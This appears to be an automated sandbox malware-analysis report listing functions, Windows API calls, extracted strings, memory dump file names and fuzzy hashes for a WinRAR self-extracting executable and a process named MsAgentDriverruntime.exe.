Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2706921342-3849766595
Opcode ID: e9078b16bddad838330d30520a8bd8c986321615586a967360d0f7ceb0e1e6a3
Instruction ID: da860db29fdca025404c93d03f3d40be24e96a30087c0c14bd51d5b320886a6e
Opcode Fuzzy Hash: e9078b16bddad838330d30520a8bd8c986321615586a967360d0f7ceb0e1e6a3
Instruction Fuzzy Hash: B001DBB53443496BD3326F649C92FB673ADEB41751F10002DF9875B1D0CAA17CC99724

Function 0034C058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0034C080

Strings

?*<>|", xrefs: 0034C06D, 0034C07F
<97, xrefs: 0034C076

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _wcschr
String ID: <97$?*<>|"
API String ID: 2691759472-462569954
Opcode ID: 127edfa68e7b09258955f8ff63c050a5423ce8e9bda0cd7d6278a1b6a1b65792
Instruction ID: e02168690b38e458caa3749514c4d7c0bf741988a7b8607788c0407a6cb42620
Opcode Fuzzy Hash: 127edfa68e7b09258955f8ff63c050a5423ce8e9bda0cd7d6278a1b6a1b65792
Instruction Fuzzy Hash: 8AF0F917666701C1C7721F245801732F3E4DF96330F36581EE5C48F1C2E6A5E8C09655

Function 0035DB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0035DBAC

Strings

5, xrefs: 0035DB9F
Software\WinRAR SFX, xrefs: 0035DB95

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _wcslen
String ID: Software\WinRAR SFX$5
API String ID: 176396367-3960434700
Opcode ID: c8c44271c55c6f28e806ec16c7942fa160e19120e7a6e71b3762f121c9962f09
Instruction ID: 07be69b081cb3a59140f4f8651687feb9ffe4c5522101b9867be082e94252fdd
Opcode Fuzzy Hash: c8c44271c55c6f28e806ec16c7942fa160e19120e7a6e71b3762f121c9962f09
Instruction Fuzzy Hash: 82011E71500218BAEB33AB91DC0AFDB7F6DEB05756F014052B94AA5061D7A04A88C7A1

Function 0035AE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 0034C29A: _wcslen.LIBCMT ref: 0034C2A2

Part of subcall function 00351FDD: _wcslen.LIBCMT ref: 00351FE5
Part of subcall function 00351FDD: _wcslen.LIBCMT ref: 00351FF6
Part of subcall function 00351FDD: _wcslen.LIBCMT ref: 00352006
Part of subcall function 00351FDD: _wcslen.LIBCMT ref: 00352014
Part of subcall function 00351FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0034B371,?,?,00000000,?,?,?), ref: 0035202F

Part of subcall function 0035AC04: SetCurrentDirectoryW.KERNELBASE(?,0035AE72,C:\Users\user\Desktop,00000000,0038946A,00000006), ref: 0035AC08

_wcslen.LIBCMT ref: 0035AE8B

Strings

C:\Users\user\Desktop, xrefs: 0035AE68
<5, xrefs: 0035AEC4

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _wcslen$CompareCurrentDirectoryString
String ID: <5$C:\Users\user\Desktop
API String ID: 521417927-892011365
Opcode ID: 77f45859d58252d633fed7bec4496a89c91d1eed896e17c40654362d3f86bda2
Instruction ID: 5132a24819cfbc3c1fda4efba865961a4eba198849bb37b3a32599bd6c67da71
Opcode Fuzzy Hash: 77f45859d58252d633fed7bec4496a89c91d1eed896e17c40654362d3f86bda2
Instruction Fuzzy Hash: 6E012171D0071965DF23ABA4DD0BEDF73FCAF09701F040466FA06E71A1E6B4A6488BA5

Function 0036BB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003697E5: GetLastError.KERNEL32(?,00381030,00364674,00381030,?,?,00363F73,00000050,?,00381030,00000200), ref: 003697E9
Part of subcall function 003697E5: _free.LIBCMT ref: 0036981C
Part of subcall function 003697E5: SetLastError.KERNEL32(00000000,?,00381030,00000200), ref: 0036985D
Part of subcall function 003697E5: _abort.LIBCMT ref: 00369863

_abort.LIBCMT ref: 0036BB80
_free.LIBCMT ref: 0036BBB4

Strings

p7, xrefs: 0036BBAB

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID: p7
API String ID: 289325740-2520287851
Opcode ID: 76adc91622c3ab7e8ccbdd279ae63f127181ad3cebe96c1fda53c7aef4a9f86d
Instruction ID: 7ab7336196ca554a8409eea6b3058d132176ad17aca0992f59467b2b8045f209
Opcode Fuzzy Hash: 76adc91622c3ab7e8ccbdd279ae63f127181ad3cebe96c1fda53c7aef4a9f86d
Instruction Fuzzy Hash: 0801D631D00A21DFCB33AF58840161DF774BF08720B16854AE958EB699CF346D818FC1

Function 0035B425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 0035B42F

Strings

Z5, xrefs: 0035B441
(5, xrefs: 0035B457

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Malloc
String ID: (5$Z5
API String ID: 2696272793-404530066
Opcode ID: eb339af7d273711faa840747dc8c63cfc341cf245aaea238b5b6feeaa9485c19
Instruction ID: 5b847e8d7a7a53a49b5c420da6cc1e6063c023ce6097e9bc4811165abc577402
Opcode Fuzzy Hash: eb339af7d273711faa840747dc8c63cfc341cf245aaea238b5b6feeaa9485c19
Instruction Fuzzy Hash: 980146B6600108FFDF069FB1DC49CAEBBADEF09345B000159B906D7120EA31AA45DBA0

Function 00368268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0036BF30: GetEnvironmentStringsW.KERNEL32 ref: 0036BF39
Part of subcall function 0036BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0036BF5C
Part of subcall function 0036BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0036BF82
Part of subcall function 0036BF30: _free.LIBCMT ref: 0036BF95
Part of subcall function 0036BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0036BFA4

_free.LIBCMT ref: 003682AE
_free.LIBCMT ref: 003682B5

Strings

0":, xrefs: 0036829B

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID: 0":
API String ID: 400815659-3130303248
Opcode ID: 1690fa5b210b3eacfb4e0fd84a24d6c6833d309c0236ad5b5a39e43510638403
Instruction ID: d06df0baebb1b9a160e369bc8b40c0b9aa04e28949197d726bbd099e7e03a06f
Opcode Fuzzy Hash: 1690fa5b210b3eacfb4e0fd84a24d6c6833d309c0236ad5b5a39e43510638403
Instruction Fuzzy Hash: 26E06527A0595245D6A3337E6C62B6B06088B8A338B558F16F510DF5DFDE50884249B6

Function 00350FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00351206,?), ref: 00350FEA
GetLastError.KERNEL32(?), ref: 00350FF6

Part of subcall function 00346C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00346C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00350FFF

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: d378f5b746543100478701df1cb5695f8f69900430a475ff9839e3754e11c0ce
Instruction ID: 93ac51ae1533c9e444f1182cb5552a19915116376b84d390d152f14e14a7b0e6
Opcode Fuzzy Hash: d378f5b746543100478701df1cb5695f8f69900430a475ff9839e3754e11c0ce
Instruction Fuzzy Hash: 35D02B7154412036C62337245C46DAE38089B52331F100704F03D591F1CB140DC16293

Function 0034E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,0034DA55,?), ref: 0034E2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0034DA55,?), ref: 0034E2B1

Strings

RTL, xrefs: 0034E2AB

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: ef69202c7e124d2169d1bb42e4b6c14ebe57e1922cb363fa425f72611013a8ef
Instruction ID: 481c9ef415a96bf1752f9a1a454dbda040bf7edfbdf1d9e709fa849a6a40c302
Opcode Fuzzy Hash: ef69202c7e124d2169d1bb42e4b6c14ebe57e1922cb363fa425f72611013a8ef
Instruction Fuzzy Hash: 80C012312407206AE63227646C0DBC36A5CAB00B11F050448B14AE91D1D6E5D580A6A0

Function 0035E470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E467

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

z5, xrefs: 0035E461
p5, xrefs: 0035E470

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: p5$z5
API String ID: 1269201914-463515895
Opcode ID: 7b64f6ed3555dc1c3a801ca90780e0462a3854a4466099fb125334c31a061223
Instruction ID: 464e5a7b4dca912c060d421b0d876154269562ff66fb1d11e7b748d98a989ae3
Opcode Fuzzy Hash: 7b64f6ed3555dc1c3a801ca90780e0462a3854a4466099fb125334c31a061223
Instruction Fuzzy Hash: 08B012C5269040BC310FD2159C02C37010CC1C1F52330D02FFC29C4491DC444E081433

Function 0035E455 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E467

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

z5, xrefs: 0035E461
U5, xrefs: 0035E455

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: U5$z5
API String ID: 1269201914-3966473058
Opcode ID: 2dd50d6f6a94ebf0880d456e9d9d9eff18ba6c54de36972bd0302a4a3d93f578
Instruction ID: f318a2ca4bf870ee733d9e271819492c27d8693dc08c8b2dc63e5d9e9e21483f
Opcode Fuzzy Hash: 2dd50d6f6a94ebf0880d456e9d9d9eff18ba6c54de36972bd0302a4a3d93f578
Instruction Fuzzy Hash: C3B012D52680007C310F51119D03C37020CC1C1F12330D02FFE26C44A1DC480F090432

Analysis Process: MsAgentDriverruntime.exePID: 7644, Parent PID: 7592COMMON

Execution Graph

Execution Coverage:	6.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	4
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B750D78 Relevance: .3, Instructions: 263
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da59d3dae07f29387910786e5d54907db303a37bc962f014bdf2ed15f8d41796
Instruction ID: da627462953997330de9eb1ae62ca7e961f3e8365494a41bf4e353e63a5a9cf2
Opcode Fuzzy Hash: da59d3dae07f29387910786e5d54907db303a37bc962f014bdf2ed15f8d41796
Instruction Fuzzy Hash: 3A91D1B5A18A8D8FEB58DFA8C8657A97FE0FF95314F0101BAE049C73E6DBB814018740

Function 00007FFD9BB493F1 Relevance: 1.8, APIs: 1, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryFullProcessImageNameA.KERNELBASE ref: 00007FFD9BB495A1

Memory Dump Source

Source File: 00000004.00000002.1782934673.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bb40000_MsAgentDriverruntime.jbxd

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: 2ea4d636591303dbf7d0a0863bfde2f8ad7ef809c05143ac20bbda8262bab336
Instruction ID: 9896716e94399d6c9756fd4c94591306c039a75d48156ef3bf2c6053ba7c5237
Opcode Fuzzy Hash: 2ea4d636591303dbf7d0a0863bfde2f8ad7ef809c05143ac20bbda8262bab336
Instruction Fuzzy Hash: D371D330609A4D8FEB68DF18D8597F837D1FB59315F00423EE88EC7292CA749941CB81

Function 00007FFD9B7508D0 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1de19f99c05967f111e1557e09e0c16ef60e80d1dad8a004abddeff63ae37db1
Instruction ID: 8a7b917db2c15a762a83653e3b6fe12ed6ab80f5d1b85f5ebc8e80c3844df66c
Opcode Fuzzy Hash: 1de19f99c05967f111e1557e09e0c16ef60e80d1dad8a004abddeff63ae37db1
Instruction Fuzzy Hash: 50412916B4D65A0EE318B2FC60A5AFD3782DF55325B0446FBE04DCB1EBDE08694282C5

Function 00007FFD9B7512F8 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f59b77f9a19acf5b7231aa5ef5bece9922305fac14419523b93b6a6f0cfd4e57
Instruction ID: 8c847dbeb0d4e8329e5b6cbbbef551ec9cd492e631d20237691786049ce4f1ab
Opcode Fuzzy Hash: f59b77f9a19acf5b7231aa5ef5bece9922305fac14419523b93b6a6f0cfd4e57
Instruction Fuzzy Hash: AF413A32A0EBC90FE76697B48C755A93BA1EF56340F0A06FBD049C71F3DD186A468341

Function 00007FFD9B750C25 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa07eeaf0ccb2c19eae6656bdc7dc528b1786b05da82154faaff1335c2630ef2
Instruction ID: 40ac8e6df4721bb4846a15e2cd0fff9327a9438bd76c72a775cd5d88f1692fff
Opcode Fuzzy Hash: fa07eeaf0ccb2c19eae6656bdc7dc528b1786b05da82154faaff1335c2630ef2
Instruction Fuzzy Hash: 8D314836B0E34A8FF725ABE898655EC7B60EF53320F0546B7D008961E3D978264B8751

Function 00007FFD9B750998 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf559b5432b3848a323f6d550de0edf98ccbb2d1f317116232c13d3207cc116a
Instruction ID: ec2187132e26f4950c4f4e44fbcfa1aed1026e99a0959ae787307188518803de
Opcode Fuzzy Hash: cf559b5432b3848a323f6d550de0edf98ccbb2d1f317116232c13d3207cc116a
Instruction Fuzzy Hash: A1214C11B1DA5D0FE768B6AC94696B537C2EF99321B0101BAE40EC33F7DD58AC438381

Function 00007FFD9B7511A1 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0b33b257cdad2590ce9c8224e989ff74162034385b11f66d9f39cf64eac8981
Instruction ID: ebb2b685b872be1de9643301639cb5ac4d1f282e76c05e60aff18ca81face4fc
Opcode Fuzzy Hash: a0b33b257cdad2590ce9c8224e989ff74162034385b11f66d9f39cf64eac8981
Instruction Fuzzy Hash: D331A730A0964E8FDB55EBE8C4659B977F0FF16301F0506FAC009C71B2DA78A942CB40

Function 00007FFD9B752751 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c04370a9f23f56c3f4b37ab832c305e16b7f3750e74bde4f218653b54491f6ce
Instruction ID: 92954f2affd5aed2e1642d93f9deb9a4f57f4324eb092c384ec959f975cf82a8
Opcode Fuzzy Hash: c04370a9f23f56c3f4b37ab832c305e16b7f3750e74bde4f218653b54491f6ce
Instruction Fuzzy Hash: 45213731B09A1D8FDBA4DF98C494AA973E1FB68314F1501B9D40ED72B1DE74AD41CB40

Function 00007FFD9B750C38 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef57a9d13f3eef821b7956ab6d0d5d656d4b7986f150ae9ec3fe37ae697e174
Instruction ID: 178ffe16b1aea263c0b2f8128bc9c512ecfe197e50242a5759d1e54b41330ed2
Opcode Fuzzy Hash: 3ef57a9d13f3eef821b7956ab6d0d5d656d4b7986f150ae9ec3fe37ae697e174
Instruction Fuzzy Hash: 2B118C36A0E38D9EE7229AE889611EC7BB0EF43610F1646B7D044DB1E2D97826468790

Function 00007FFD9B756B76 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10a50ae77d430e6075db54ea758003398fd605e13eb145e102fa4cba194afb83
Instruction ID: c3ca6111a13112b80d88eba6e8ab14de2271716f612fa0941d4fdb5e67ea76d3
Opcode Fuzzy Hash: 10a50ae77d430e6075db54ea758003398fd605e13eb145e102fa4cba194afb83
Instruction Fuzzy Hash: 98115E31F1960E4BE7B0A7E884646B873A1EF45310F2602B6D84DD72F2ED68BE428740

Function 00007FFD9B750C40 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d10c87cb0d0c6d54132dd99589c3401fafefcd584ace12caba6cb1042cbcf9eb
Instruction ID: 29306ed5a779caea4c3e47adc65e24a576e282604307833228ada98c9c6f9f42
Opcode Fuzzy Hash: d10c87cb0d0c6d54132dd99589c3401fafefcd584ace12caba6cb1042cbcf9eb
Instruction Fuzzy Hash: 36118E36A0E38D8FE722DBE889611EC7BB0EF43610F1646B7D044DB1F2D9782A468740

Function 00007FFD9B752836 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a63caeafe71e66c71837db2d987bea30252ba987fcf5d50d7f638bb73b8242ab
Instruction ID: ea64030e780ee3fbe0088966ae429b0523a7b0f11dca508185fd8d4645be1eff
